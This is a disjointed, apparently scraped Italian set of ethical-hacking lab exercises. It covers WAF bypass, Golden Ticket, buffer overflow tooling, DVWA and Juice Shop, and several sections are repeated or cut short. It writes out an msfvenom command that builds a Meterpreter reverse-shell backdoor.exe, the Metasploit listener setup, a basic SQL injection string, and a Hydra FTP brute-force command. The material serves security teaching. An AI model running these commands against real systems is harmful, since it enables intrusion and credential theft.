Bypass di WAF con Obfuscazione SQLi
Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
Ambiente:
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Tecniche utilizzate:
Commenti SQL (
/**/
)
Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Commenti SQL (/**/
)
Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.
Impacket (su Kali Linux)
Mimikatz (su Windows)
Active Directory lab (es. Windows Server 2019 + Windows 10 client)
Immunity Debugger (Windows)
Kali Linux (per generare l’exploit)
Mona.py (plugin per Immunity Debugger)
Metasploit Framework
Genera un payload per Windows con msfvenom
(parte di Metasploit):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tuo-IP> LPORT=4444 -f exe > backdoor.exe
Avvia un listener su Kali Linux con Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <tuo-IP>
set LPORT 4444
exploit
Scarica un file sospetto (es. da MalwareBazaar, solo per scopi didattici!).
Esegui:
strings <nome-file> | less
Cerca indirizzi IP, URL, comandi sospetti o altre informazioni.
Usa DVWA (Damn Vulnerable Web App) su Metasploitable.
Procedura:
Accedi a DVWA (http://<indirizzo-IP-target>/dvwa
) e loggati.
Vai alla sezione "SQL Injection".
Inserisci nel campo di input:
' OR '1'='1
Assicurati di avere un server FTP vulnerabile (es. su Metasploitable).
Crea o scarica una wordlist (es. rockyou.txt
su Kali Linux).
Esegui Hydra:
hydra -l <username> -P <percorso-wordlist> ftp://<indirizzo-IP-target>
Se il login ha successo, prova ad accedere manualmente con:
Innanzitutto è sempre utile richiamare due principi di base:
l'esercizio è solo ad uso didattico
deve essere effettuato sempre su una nostra macchina virtuale
Dopo aver avviato la macchina virtuale:
troviamo il suo IP con il comando ip route
o se vuoi più dettagli ip addr show
OWASP Juice Shop è una delle applicazioni web più insicure mai realizzate – ed è intenzionale. Serve come piattaforma per la formazione alla sicurezza delle applicazioni web in modo moderno e gamificato.
Funzionalità principali
DVWA è una web application deliberatamente vulnerabile progettata per test di sicurezza ed esercitazioni di ethical hacking. È ideale per imparare e praticare attacchi comuni in un ambiente controllato.
Funzionalità principali: